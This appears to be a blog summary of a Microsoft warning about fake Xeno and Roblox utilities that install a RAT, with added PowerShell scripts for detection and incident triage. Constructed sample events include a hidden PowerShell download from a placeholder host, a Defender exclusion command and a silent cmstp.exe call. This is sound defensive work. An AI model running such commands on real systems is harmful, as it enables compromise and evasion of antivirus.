Fake Xeno and Roblox Utilities Used to Install Windows RAT, Microsoft Warns

  • Mar 1

Key Findings


  • Cybersecurity researchers at Microsoft Threat Intelligence have found that attackers are circulating fake gaming tools that install a remote access trojan (RAT) when users run the files.

  • The campaign relies on trojanized executables, distributed through browsers and chat platforms, that borrow the names of real gaming utilities (Xeno.exe, RobloxPlayerBeta.exe) so that they look legitimate at first glance.

  • The initial file acts as a downloader that prepares the system for the next stage of the attack, installing a portable Java runtime and launching a malicious Java archive.

  • The downloader runs commands through PowerShell and abuses cmstp.exe, the signed Connection Manager Profile Installer that ships with Windows and is well documented as a living-off-the-land binary for executing attacker-supplied code, so that most of the malicious activity is carried out by software already present on the system.

  • The final malware functions as a loader, runner, downloader, and remote access tool, giving the attackers broad control over the compromised system.


Background


Microsoft Threat Intelligence uncovered a campaign that lured users into running trojanized gaming utilities (Xeno.exe or RobloxPlayerBeta.exe) distributed through browsers and chat platforms. Running either file starts a multi-stage chain that ends with the deployment of a remote access trojan (RAT).


Infection Vector


  • Victims are not exploited through a software vulnerability; they are persuaded to download and run an executable themselves, because it arrives through a browser download or a chat platform under a familiar gaming-tool name.

  • The initial file acts as a downloader that prepares the system for the next stage: it installs a portable Java runtime (so the payload runs even where Java is not installed) and launches a malicious Java archive named jd-gui.jar. The name is borrowed from JD-GUI, a legitimate Java decompiler, which makes the file look innocuous in a process list.


Malicious Payload


  • Instead of shipping obvious malware components, the attackers lean on built-in Windows tools: commands are run through PowerShell, and cmstp.exe, a signed system binary, is abused to execute attacker-controlled content. Because both binaries are legitimate and signed, simple allow-listing by file name or signature does not stop the chain.

  • The PowerShell script included in the attack chain attempts to contact several remote locations in turn (a common fallback pattern that keeps the chain working if one host is taken down) and downloads an executable into the user's local application data directory (%LOCALAPPDATA%), a user-writable path that needs no elevation to write to.

  • The final stage of the chain is the RAT proper, which Microsoft describes as functioning as a loader, runner, downloader, and remote access tool, giving the attackers broad, interactive control over the compromised system and the ability to fetch further payloads.
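The chain above (a Java runtime unpacked under the user profile, PowerShell spawned by Java, cmstp.exe started from a shell, a download into LocalAppData, and a Defender exclusion being added) can be turned into process-creation triage rules. The following is an added example, not code from the original post or from Microsoft's report. The field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample records, the user name, the paths and every command line in them are constructed for illustration and are not telemetry from the campaign.

```powershell
# Added example, not code from the original post or from Microsoft's report.
# Triage process-creation records for the chain described above. Field names
# follow Sysmon Event ID 1 (Image, ParentImage, CommandLine).

function Test-GamingLureChain {
    param([Parameter(Mandatory)][object[]]$Events)

    $shells = @('powershell.exe', 'pwsh.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe')
    $java   = @('java.exe', 'javaw.exe')

    foreach ($e in $Events) {
        $img     = [System.IO.Path]::GetFileName($e.Image).ToLowerInvariant()
        $parent  = [System.IO.Path]::GetFileName($e.ParentImage).ToLowerInvariant()
        $cmd     = [string]$e.CommandLine
        $reasons = [System.Collections.Generic.List[string]]::new()

        # Rule 1: Java binary located under a user profile (a "portable" JRE the
        # downloader unpacked) running a JAR. Java under Program Files is ignored.
        if (($img -in $java) -and ($e.Image -match '\\Users\\') -and ($cmd -match '-jar\s+\S+\.jar')) {
            $reasons.Add('Java runtime in user profile launching a JAR')
        }
        # Rule 2: PowerShell whose parent process is Java.
        if (($img -in @('powershell.exe', 'pwsh.exe')) -and ($parent -in $java)) {
            $reasons.Add('PowerShell spawned by Java')
        }
        # Rule 3: cmstp.exe started by a shell, script host or Java. A user
        # installing a connection profile normally starts it from Explorer or an installer.
        if (($img -eq 'cmstp.exe') -and ($parent -in ($shells + $java))) {
            $reasons.Add('cmstp.exe launched from a shell or script host')
        }
        # Rule 4: Defender exclusion added from a command line.
        if ($cmd -match '(Add|Set)-MpPreference.*-Exclusion') {
            $reasons.Add('Defender exclusion added via MpPreference cmdlet')
        }
        # Rule 5: PowerShell downloader writing into %LOCALAPPDATA%.
        if (($img -in @('powershell.exe', 'pwsh.exe')) -and
            ($cmd -match 'DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b') -and
            ($cmd -match 'AppData\\Local|LOCALAPPDATA')) {
            $reasons.Add('PowerShell download into LocalAppData')
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{ Image = $e.Image; Parent = $e.ParentImage; Reasons = ($reasons -join '; ') }
        }
    }
}

# Constructed sample records (not real telemetry). The user name, paths, the
# example.invalid host and the cmstp switches are illustrative assumptions; the
# report does not say how the campaign invoked cmstp.exe.
$sampleEvents = @(
    [pscustomobject]@{ Image = 'C:\Users\alice\Downloads\Xeno.exe'
                       ParentImage = 'C:\Program Files\Mozilla Firefox\firefox.exe'
                       CommandLine = '"C:\Users\alice\Downloads\Xeno.exe"' }
    [pscustomobject]@{ Image = 'C:\Users\alice\AppData\Local\Temp\jre\bin\javaw.exe'
                       ParentImage = 'C:\Users\alice\Downloads\Xeno.exe'
                       CommandLine = 'javaw.exe -jar C:\Users\alice\AppData\Local\Temp\jd-gui.jar' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Users\alice\AppData\Local\Temp\jre\bin\javaw.exe'
                       CommandLine = 'powershell.exe -w hidden -c "Invoke-WebRequest http://example.invalid/u -OutFile $env:LOCALAPPDATA\update.exe"' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\cmstp.exe'
                       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\profile.inf' }
    [pscustomobject]@{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Users\alice\AppData\Local\Temp\jre\bin\javaw.exe'
                       CommandLine = 'powershell.exe -c "Add-MpPreference -ExclusionPath $env:LOCALAPPDATA"' }
    # Benign control: the real JD-GUI started by the user from Program Files matches no rule.
    [pscustomobject]@{ Image = 'C:\Program Files\Java\jdk-17\bin\javaw.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'javaw.exe -jar C:\Tools\jd-gui.jar' }
)

Test-GamingLureChain -Events $sampleEvents | Format-Table -AutoSize
```

Running this flags records two to five (one or two reasons each) and stays silent on the first and last, which is the point: the file name jd-gui.jar alone is not the signal, the combination of a Java runtime under a user profile and the processes it spawns is. On a live host with Sysmon process-creation logging, entries from Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } can be mapped onto the same three property names and passed to -Events.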


Persistence and Evasion


  • The malware modifies Microsoft Defender settings by adding exclusions for the malicious files, so the RAT components are never scanned by the engine. Changing Defender exclusions requires administrative rights, so the chain is running elevated by this stage.

  • It also establishes persistence through scheduled tasks and a startup script named world.vbs, so the chain restarts after a reboot and the attackers keep long-term access to the infected device even after the original lure file is deleted.


Recommendations


  • Microsoft Defender already detects the malware and the behaviour patterns used in this campaign, but Microsoft advises organizations to monitor outbound traffic and block connections to the domains and IP addresses published as indicators of compromise with the advisory (they are not reproduced in this summary).

  • Microsoft urges organizations to review Microsoft Defender exclusions and scheduled tasks for anything unusual, and to remove any suspicious entries as part of the incident response process; an exclusion pointing into a user profile, or a task whose action runs a script from a temp directory, is a strong signal on its own.

  • Users should be cautious when downloading and running gaming tools or other software, especially from unofficial sources or links shared in chat, since a familiar file name is no evidence that the file is the real utility.
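The Persistence and Evasion section and the review recommendation above describe three artifacts worth pulling from a suspect host: Defender exclusions, scheduled task actions, and Startup-folder scripts such as world.vbs. The following is an added example, not code from the original post or from Microsoft's report, that collects and flags them for an analyst; it reports only and removes nothing. It assumes a Windows host with the built-in Defender and ScheduledTasks PowerShell modules and an elevated session; the regular expressions used to mark entries as suspicious are the editor's heuristics, not Microsoft's detection logic.

```powershell
# Added example, not code from the original post or from Microsoft's report.
# Collects the persistence and evasion artifacts the report describes so a
# responder can review them. Run from an elevated PowerShell session.

function Get-DefenderExclusionReport {
    # Get-MpPreference ships with Defender; each exclusion list is $null when
    # empty, so @() and Where-Object guard against a lone null element.
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath) | Where-Object { $_ }) {
        # An exclusion inside a user profile or temp directory is rare on a managed host (heuristic).
        [pscustomobject]@{ Type = 'Path'; Value = $p
                           Suspicious = [bool]($p -match '\\Users\\|AppData|\\Temp\\|Downloads') }
    }
    foreach ($p in @($pref.ExclusionProcess) | Where-Object { $_ }) {
        [pscustomobject]@{ Type = 'Process'; Value = $p
                           Suspicious = [bool]($p -match 'java|powershell|cmstp|wscript|cscript') }
    }
    foreach ($x in @($pref.ExclusionExtension) | Where-Object { $_ }) {
        [pscustomobject]@{ Type = 'Extension'; Value = $x
                           Suspicious = [bool]($x -match '^\.?(exe|jar|vbs|ps1|dll)$') }
    }
}

function Get-ScheduledTaskReport {
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        $task = $_
        foreach ($a in @($task.Actions)) {
            # Only exec actions carry Execute/Arguments; COM-handler actions have no Execute.
            if ($a.Execute) {
                $exec = ("$($a.Execute) $($a.Arguments)").Trim()
                if ($exec -match '\\Users\\|AppData|\\Temp\\|\.jar\b|\.vbs\b|cmstp|powershell|wscript|cscript') {
                    [pscustomobject]@{ Task   = $task.TaskPath + $task.TaskName
                                       Author = $task.Author
                                       State  = $task.State
                                       Action = $exec }
                }
            }
        }
    }
}

function Get-StartupFolderReport {
    # All-users Startup folder plus the per-user folder of every local profile,
    # since the compromised account may not be the one running this script.
    $dirs = @(Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp')
    $dirs += Get-ChildItem -Path (Join-Path $env:SystemDrive 'Users') -Directory -ErrorAction SilentlyContinue |
        ForEach-Object { Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' }
    foreach ($d in ($dirs | Sort-Object -Unique)) {
        Get-ChildItem -Path $d -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Extension -match '^\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1|lnk|exe|jar)$' } |
            ForEach-Object {
                [pscustomobject]@{ Path          = $_.FullName
                                   LastWrite     = $_.LastWriteTime
                                   NamedInReport = ($_.Name -ieq 'world.vbs') }
            }
    }
}

Get-DefenderExclusionReport | Format-Table -AutoSize
Get-ScheduledTaskReport     | Format-Table -AutoSize
Get-StartupFolderReport     | Format-Table -AutoSize

# Remediation once an entry is confirmed malicious (illustrative placeholders, not run here):
#   Remove-MpPreference -ExclusionPath '<excluded path>'
#   Unregister-ScheduledTask -TaskName '<task name>' -TaskPath '<task path>' -Confirm:$false
#   Remove-Item '<startup folder>\world.vbs'
```

The task report will also list some legitimate entries that happen to call PowerShell or live under a profile directory, which is deliberate: the output is a review list, and the LastWrite and Author columns are what let an analyst separate a vendor task from one registered around the time Xeno.exe was run. Collect the output before removing anything so the artifacts are preserved for the incident record.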


Sources


  • https://hackread.com/microsoft-fake-xeno-roblox-utilities-windows-rat/

  • https://news.backbox.org/2026/03/01/fake-xeno-and-roblox-utilities-used-to-install-windows-rat-microsoft-warns/

© 2025 by Explain IT Again